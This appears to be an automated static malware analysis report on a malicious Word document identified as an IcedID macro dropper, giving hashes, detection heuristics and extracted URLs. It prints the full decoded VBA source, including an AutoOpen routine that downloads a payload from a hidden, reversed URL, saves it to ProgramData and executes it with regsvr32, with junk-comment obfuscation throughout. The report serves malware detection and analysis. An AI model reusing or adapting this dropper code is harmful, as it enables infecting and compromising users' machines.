Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 cce919ff5db9c773…

MALICIOUS

Office (OOXML)

141.1 KB Created: 2020-10-13 10:58:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2020-10-16
MD5: e261f131a690a684df19976be8703ecb SHA-1: b7b554c968e85c6b68f0760b4d3cef94c7ec6925 SHA-256: cce919ff5db9c773e0965498d812377b6ee5e88a5d9885810ff480c04741a649
230 Risk Score

Heuristics 6

  • ClamAV: Doc.Macro.ICEID1020-9781212-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.ICEID1020-9781212-0
  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set lPKls = CreateObject("Script" + LYWOU)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 12057 bytes
SHA-256: e9306b0182d67639456da93a24ffb39276ab82015518ff9eb986116636412949
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "RxaCt"
Sub wnvzC(QBYwq, Optional ByVal AHCbJ As String = "c:\programdata\oIXPT.txt", Optional ByVal LYWOU As String = "ing.FileSystemObject")
' Puritans atombomb iridium
' Chieftain circumstances
' Onagers insurgent caftan pioneered clutched
' Exercise abode placid
' Moraine stupid blender dumpy
' Revolutions
' Tongs terser plasterboard
' Rejoices nightmares flips teas
' Commendable adieux blamed avalanche
' Bonnie
' Avian oranges heightened benelux
' Stratagems drive zoologist scrolling hunger
Set lPKls = CreateObject("Script" + LYWOU)
' Xrays workloads disqualification clinked
' Knotting involved sinusoidally idiosyncratically
' Prejudice
' Thunderstruck hysteric knuckles
' Pears seasonable wanderer destitution
Set rtrwy = lPKls.CreateTextFile(AHCbJ)
' Debacles racings unlink duckling coprocessor envelops
' Personifying neuralgia
' Demagnetise biotic
' Streptomycin propositioning crusted fusion silage
' Recoverability
' Mute remaking
' Cataracts sedges stockist
rtrwy.WriteLine QBYwq
' Civilians cytogenetic rhizome
' Inexperience gleam reappear
' Truer jazziest burns gangway linoleum
' Rivals aural elapses foams
rtrwy.Close
' Exponential breastfeed comprehensives cyphers shipwreck
' Repeaters
' Partitions cherish staunching harmonica
' Rivalling rectification blackboards
' Sack friendships beasts infarction chilled
' Response dockyards plaint
' Exotic
' Peevishly impales cinema maximiser
' Prompt contaminate
' Tempts delivers vortex ceramics luminescent
' Solecism souls section
' Otherwise lungful titillated peacock marshal empowering
' Vaporisation falter ana footballing
' Nectar tonsillectomy incomprehensible
' Anthologised boxoffice withdraws brewage
' Remade vitriol rector
' Planets barefoot barbarous
' Overlying hotspot orderliness rampaged
' Daughters
' Guesswork craws
' Explosives lovable saute congregation outfield
' Seashores sticker rapists extricating
' Chaotic share lobotomist unploughed sublunary babylon
' Wanders archaic rhea writer demounted
' Dependence
' Piercingly disablement reticule reacquisition heptagon
' Jeep capitalises cockshies
' Selfconscious mousetraps
' Cordillera
' Gravestone innovated
' Vegetational mopes inscrutability millers jazz integrability display
' Clanking unsmooth gauges equips chipboard
' Minim chimpanzee
' Incline reschedule couriers
' Entrails matchmaking
' Alumni pixels greenfield
End Sub
' Louts incriminated
' Cacophony tarzan
' Adulterates duplicability doorstep
' Annul waitress
' Admen entry voluble circularise
' Pavement linked
Sub AutoOpen()
' Esteem pilgrims wakes agents
' Grossed upsidedown shrinks blockbuster bated
' Proximate
' Slacker amalgamation touchiness ribcage
' Grants birthrights abduction survivors
' Reprovingly
' Scarified examiners unsighted ricks
' Point monasteries
' Verifiability disliked knesset
' Corporals belittle
' Shelve classiest
' Fattened puissant crashlanded stems
' Mangles opposite xenophobia
' Parameter sweetening
' Slick capriciously
' Lithograph pantograph debut
' Singleness
' Neonatal goodhope commemorates wetsuit
' Typographer benevolence ambivalent mariners crossexamined hands arrive
' Benchmark
' German mingles truncate articulation
' Academies scavenged
' Millstone capitally
' Formulates bulldozers section
' Vigil enmities
' Expired uninsurable
' Slogged prostate unsoiled bloomers lobes
Dim izVGk As New Aeuec
' Ancestry gatecrash ejected ganglia inland companions
' Recirculated instanced bouts
' Stilts complimented tot
' Staunch fortifying anger
' Spanner informatively extradite
' Grotesqueness
QBYwq = izVGk.bQbaR("MSXML2.serverXMLHTTP")
' Doings interrogator earthen clicking propagating
' Orangutans photo dually acrylic meek
' Explanatory pump straight
' Stalled pallmall
wnvzC BcBPC(QBYwq)
' Direction seismologist midshipman
' Asbestosis avidly launderettes tot taxis declamation
' Quakes immaculately characterful patently dirges
' Taramasalata capitulate
' Brute
' Mulling actings primitively
' Reopened reconvened
' Weeper stereoscopy veritable atmospheric
' Legwork unilateral
' Separations cockpits
' Jerkins afflicting painstaking armada
' Idled oxtails drummed exeunt
' Informs unstack pasteurised engraved flattens uneaten
' Revaluation mated subbed inviolate encore
AdjIn kGmwO(0) + "vr32 c:\programdata\oIXPT.txt", "ws"
End Sub
Function OWnZV(KFpFM, nfdDd)
' Coiling pennants
' Wayside moated upstages
' Stations rapports bender colliding
' Abominations howling pensionable nationalised ophthalmic circularised
' Brabbles masterpiece stalwarts atrophies critical bullock
OWnZV = Split(KFpFM, nfdDd)
End Function

Attribute VB_Name = "eBJXY"
' Fairies boardrooms boudoirs plunging holds
' Lecturers bulldogs surroundings painlessly
' Sinus gigolo tartrate unprejudiced
' Snooping tourists compress brokers
' Anatomies
Function BcBPC(cpqSH)
' Prejudge ways conservationist timescale heir
' Memory
' Primness sulkiest
' Spadework fidgety finial
' Balances microfilming isolationism
' Computations evaded
' Procurements chastised sneak renounced
' Vermin atrocities haunt
BcBPC = StrConv(cpqSH, vbUnicode)
' Epitaph vilest catapulting reservoirs
' Southernmost sale earthling
' Wire condemns deniable sawyers attractor
' Measures
' Android demonstratively collide growers ostracise
' Reflected redeemable rationed
' Amplifying everincreasing dishonourable
' Fatty latitude
End Function
' Noel
' Postmistress
' Prices
' Gunpoint
' Yolk leaded perishing
Function fFaJz()
' Captives selfcentredness
' Fielded lampoon bespeaking
' Segment change fiftieth
' Prurient carroty quenched retreats
' Turks slipperiness colossal
' Antagonistic starer advises
' Hooter familiarity
' Resurrect
' Jeremiah slimmest anonymity
' Exhilarating
' Severity cuddling
With ActiveDocument.shapes(1)
fFaJz = .AlternativeText
End With
End Function
' Academies lawmaker engagements
' Grisliest external inadequacies impresario subcommittees
' Discomfit immigrants baaing
' Undifferentiated draughtsmen
' Chutney consensual
' Engorged bleaker
Function kGmwO(QurcP)
' Galilean abeam dissimilar
' Subsidiarity scrotum foe neural hyperbolic yolk
' Squaw fieldworkers botch encyclopedic
' Palpitating donut placate careworn ore
' Poltroon substantiate navigated vaccinated
' Meshes pattering weathermen
' Seronegative carers
' Visas illusion bungles promising waterskiing
' Haitian technocracies
' Underperformance spacers unclench
' Transaction patrols muddier
' Liberates corrections emulated
XGCOM = fFaJz()
cfqNf = OWnZV(XGCOM, "###")
MoZOI = cfqNf(QurcP)
kGmwO = MoZOI
End Function

Attribute VB_Name = "Aeuec"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function Reverse(Text)
    Dim i As Integer
    Dim StrNew As String
    Dim strOld As String
    strOld = Trim(Text)
    For i = 1 To Len(strOld)
      StrNew = Mid(strOld, i, 1) & StrNew
    Next i
    Reverse = StrNew
End Function
' Circumcise cardboard las freckled pipings divide warns
' Prepayment unlit vineyard
' Encourage emu resiny
' Ungraciously
' Vilified
' Requisite
Function bQbaR(DdGps)
' Evaporating taxidermist herself derisive
' Quenched toothed debatable garrets
' Reopening tilling
' Philology purposefully paymasters onward heartwarming supercritical angstroms
Dim fIwKD As Object
' Flipping constitutional aggravated
' Timers premises
' Commander histogram
' Nonessentials
' Gestation betimes spurge stall
' Camps
' Plush untypically monopolised nonessentials
' Dearer lowlanders incandescently prosody adjudicate fibres
' Glooms sneezed dissolved imparting
' Outlives engulfs
' Patisserie hydraulics revivifying
Set fIwKD = CreateObject(DdGps)
' Planted gravity repaired
' Broadcasters absolution arbitrated extras
' Equalling liveable dialectics
' Miscellanies
' While jarl baronial waggles
' Camping retrofitting
' Reminding perfidious screeches consequential mailbox
' Accessible differed versatile
' Yells lector amid flubbed shrugging obscenities
' Rarer minimalistic notching
' Doubters
' Childbearing plushy light overtightened gangs understated
' Registry firebombs
' Snapshots processors school bleeping unmatched teleprinters
' Shouting
' Previewers perk express eyed couturiers suasion observatories imperceptible
' Infra cycle metronomes flourishes taxdeductible
' Demoralisation gypsies recommendations basest
' Fined cartridges rocks telescoped
' Shoemaker conclusions retiring spoken
' Routs accra
' Athleticism detente chorals format saturating
' Fans disembowelled
' Attests unconstrained
' Clasp penetratingly instinctively positionable
kEtzP = kGmwO(1)
' Avalanches getrichquick
' Bullies humpback skier clouding
' Voluntarily biasses
' Spain dislodge
fIwKD.Open "GET", Reverse(kEtzP), False
' Wraparound revamping borer contradicting
' Missuses sirloin grubby resiting chauffeured setup
' Dimmest calibrators inquorate
' Fashioned
' Fathoms dodge
fIwKD.Send
' Prim chivalrous unwilling collaboratively alkalinity hamlets soweto
' Ripe impossible pollutes
' Shunters whirligig spurted delight
' Polecats dousing
' Unfold determiner groovier
bQbaR = fIwKD.responsebody
End Function

Attribute VB_Name = "XZvUC"
Sub AdjIn(HQwQT, OniCN)
' Rid
' Olympiad brasiers beneath ethological
' Boardroom volumetric
' Imbeds fuelled obedient
' Dissonances gophers
' Archbishop magnums diatribes
Set kaHFl = CreateObject(OniCN + "cript.shell")
' Crave wandering
' Rebalanced nonbeliever frighteners retreating
' Altering gdansk squeamishly
' Aviation beachy hell triumphing propagated
' Redirect paintings satchel efficiencies
' Scares pitons strokes wicker
' Brainlessly comely hats latched radiogalaxy
' Weapons unisons fawns trafficker thrasher folklorist
' Demonise roebuck cordials severest glorifies
' Flatterer potentate quashed immoderate sarge iconoclasts cuckoos
' Smilingly mandarins sepulchral complicate
' Dispossession terminate essence
' Spread hippies
' Unearthly extraterrestrial commonlaw differentiating
' Annotations apiaries reeking selfconsciously
' Deafer wrathfully prospering lengthier algebraical
' Unfeasible repertory retorting stow desk
' Adjusted capitalise psychedelic distinguishably flukes
' Granule mitigatory
' Chaired intoned empathy anxiously
' Hobs desensitising notations beachhead scruffier scratchy hobbles futurism
' Transportation
' Repairing treasonous listener
' Afloat debrief decayed baboon
' Struggling consent negligence reputedly prises overstepping rescans
' Swimsuits pitiably performances neuter zippy
' Shuttered hung environmentalism
' Contouring palpate
' Hotbeds obscurity quaternary paediatricians
' Overspent bosnia
' Damages eyelike excusable renegotiation
' Rescinded interactions warlike
' Runt
' Underplays capping cursed
' Unsaddled gong hotplate gin
' Indoctrinates ratepayer shoals celestial
' Explosions crossexamines communication subventions
' Visibly
' Missals hypocrites srilanka ephor geochemical indecorous
' Byline
' Uncontroversial consorting
' Billy joystick
' Hereinafter
' Unlabelled pipers gel counsel
' Propositions
' Multiplicative odours
' Indeterminable choreography
kaHFl.exec HQwQT
' Disaffiliated realisations resume hippo headscarves
' Photoelectrically balance personality hopefuls faring
' Translational clergy ventriloquy gypsy
' Indirectness desisted
End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 45056 bytes
SHA-256: eff7a35293f7d8a12f5730993e633d3bff5f08ce48d3b2f0344984791d786568
Detection
ClamAV: Doc.Macro.ICEID1020-9781212-0
Obfuscation or payload: unlikely